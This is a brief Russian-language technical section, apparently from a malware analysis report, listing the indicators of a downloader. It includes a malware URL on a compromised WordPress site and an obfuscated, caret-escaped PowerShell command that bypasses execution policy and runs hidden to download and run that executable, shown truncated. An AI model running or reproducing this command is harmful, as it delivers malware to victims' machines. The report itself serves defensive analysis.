Техническая информация
- http://kellymeyer.ca/wp-includes/upgrade/lmzt0/b5b5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OwE^rS^hEll^.E^x^e ^-^eXec^UtIon^p^oLic^Y bY^PAss^ ^-n^O^P^Ro^F^ILe ^-wI^NdOW^s^tYL^e H^id^De^n ^(^new^-^ObJECT^ SY^S^tEM.^nE^t.WeBcLIeNT^)^.^dO^wNl^oad^F^I^l^e^(^'http://kellym...
- 'ke###meyer.ca':80
- http://ke###meyer.ca/wp-includes/upgrade/lmzT0/B5B5.exe
- DNS ASK ke###meyer.ca
- '<SYSTEM32>\cmd.exe' /c "P^OwE^rS^hEll^.E^x^e ^-^eXec^UtIon^p^oLic^Y bY^PAss^ ^-n^O^P^Ro^F^ILe ^-wI^NdOW^s^tYL^e H^id^De^n ^(^new^-^ObJECT^ SY^S^tEM.^nE^t.WeBcLIeNT^)^.^dO^wNl^oad^F^I^l^e^(^'http://kellym...' (со скрытым окном)